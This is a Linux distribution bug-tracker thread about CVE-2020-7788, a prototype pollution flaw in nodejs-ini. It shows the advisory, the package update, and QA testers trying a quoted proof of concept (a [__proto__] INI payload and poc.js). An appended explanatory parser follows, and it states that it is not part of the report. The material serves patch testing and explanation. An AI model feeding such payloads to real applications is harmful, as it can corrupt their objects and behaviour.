Bug 27901 - nodejs-ini new security issue CVE-2020-7788
Status: NEW
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 7
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
Reported: 2020-12-22 17:19 CET by David Walser
Modified: 2021-01-02 23:45 CET
Source RPM: nodejs-ini-1.3.5-3.mga8.src.rpm

Description David Walser 2020-12-22 17:19:55 CET
Debian-LTS has issued an advisory on December 21:
https://www.debian.org/lts/security/2020/dla-2503

The issue is fixed upstream in 1.3.6.

Mageia 7 is also affected.

David Walser 2020-12-22 17:42:25 CET

Whiteboard: (none) => MGA7TOO

Comment 1 Lewis Smith 2020-12-22 20:37:35 CET
Assigning to Stig for this SRPM.

Assignee: bugsquad => smelror

Comment 2 Nicolas Lécureuil 2020-12-25 18:42:04 CET
Fixed in Cauldron by updating to version 1.3.8.

Version: Cauldron => 7
CC: (none) => mageia
Whiteboard: MGA7TOO => (none)

Comment 3 Nicolas Lécureuil 2020-12-25 19:43:55 CET
Updated in mga7 (to 1.3 branch, to make sure we do not break other nodejs deps)
src: 
    nodejs-ini-1.3.8-1.mga7

Assignee: smelror => qa-bugs

Comment 4 David Walser 2020-12-25 19:55:00 CET
Advisory:
========================

Updated nodejs-ini package fixes security vulnerability:

It was discovered that there was an issue in nodejs-ini, where an application
could be exploited by a malicious input file. This affects the package ini
before 1.3.6. If an attacker submits a malicious INI file to an application
that parses it with ini.parse, they will pollute the prototype on the
application. This can be exploited further depending on the context
(CVE-2020-7788).


References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
https://www.debian.org/lts/security/2020/dla-2503
========================

Updated packages in core/updates_testing:
========================
nodejs-ini-1.3.8-1.mga7

from nodejs-ini-1.3.8-1.mga7.src.rpm

Comment 5 Len Lawrence 2020-12-30 21:07:21 CET
mga7, x86_64

Installed nodejs files before updating.

CVE-2020-7788
https://snyk.io/vuln/SNYK-JS-INI-1048974
$ cat payload.ini
[__proto__]
polluted = "polluted"
$ cat poc.js
var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)

The test is to use nodejs interactively - this is what is expected:
$ node
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

But this is what happens here:
$ node
> node poc.js
Thrown:
node poc.js
     ^^^

SyntaxError: Unexpected identifier
> poc.js
Thrown:
ReferenceError: poc is not defined
> .exit

Cannot figure out what is going on here.  The REPL definitely works so maybe my interpretation of the PoC procedure is wrong.

CC: (none) => tarazed25

Comment 6 Len Lawrence 2021-01-02 23:45:26 CET
Running the PoC code explicitly in the REPL does not work.
$ node
> var fs = require('fs')
undefined
> var ini = require('ini')
Thrown:
{ Error: Cannot find module 'ini'
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:636:15)
    at Function.Module._load (internal/modules/cjs/loader.js:562:25)
    at Module.require (internal/modules/cjs/loader.js:692:17)
    at require (internal/modules/cjs/helpers.js:25:18) code: 'MODULE_NOT_FOUND' }
> 
> var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
Thrown:
TypeError: Cannot read property 'parse' of undefined
> console.log(parsed)
undefined
undefined
> console.log(parsed.__proto__)
Thrown:
TypeError: Cannot read property '__proto__' of undefined
> console.log(polluted)
Thrown:
ReferenceError: polluted is not defined
> .exit
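
The behaviour described in the advisory in comment 4, using the payload shape from comment 5, as an added example that is not part of the bug report and is not the ini package's code. parseIni, leakedKeys and the guard flag are hypothetical names for a simplified parser written here; it shows why a [__proto__] section header reaches Object.prototype and how rejecting that name stops it, without needing the ini module to be installed.

```javascript
// Hypothetical, simplified INI parser written for this example.
// It is not the source of the ini package.
// Constructed input with the same shape as payload.ini in comment 5.
const PAYLOAD = '[__proto__]\npolluted = "polluted"\n[db]\nhost = localhost\n';

function parseIni(text, guard) {
  const out = {};
  let section = out;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith(';') || line.startsWith('#')) continue;
    const header = line.match(/^\[([^\]]*)\]$/);
    if (header) {
      const name = header[1];
      if (guard && name === '__proto__') {
        section = Object.create(null); // throwaway: keys here are dropped
        continue;
      }
      // Unguarded, out['__proto__'] evaluates to Object.prototype, so the
      // key/value lines that follow are written onto the shared prototype.
      section = out[name] = out[name] || {};
      continue;
    }
    const kv = line.match(/^([^=]+)=(.*)$/);
    if (!kv) continue;
    const key = kv[1].trim();
    if (guard && key === '__proto__') continue;
    section[key] = kv[2].trim().replace(/^"(.*)"$/, '$1');
  }
  return out;
}

// Parse `text`, report property names that appeared on Object.prototype,
// then delete them so the process is left clean.
function leakedKeys(text, guard) {
  const before = new Set(Object.getOwnPropertyNames(Object.prototype));
  parseIni(text, guard);
  const leaked = Object.getOwnPropertyNames(Object.prototype)
    .filter((k) => !before.has(k));
  for (const k of leaked) delete Object.prototype[k];
  return leaked;
}

console.log('unguarded:', leakedKeys(PAYLOAD, false));
console.log('guarded:  ', leakedKeys(PAYLOAD, true));
```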
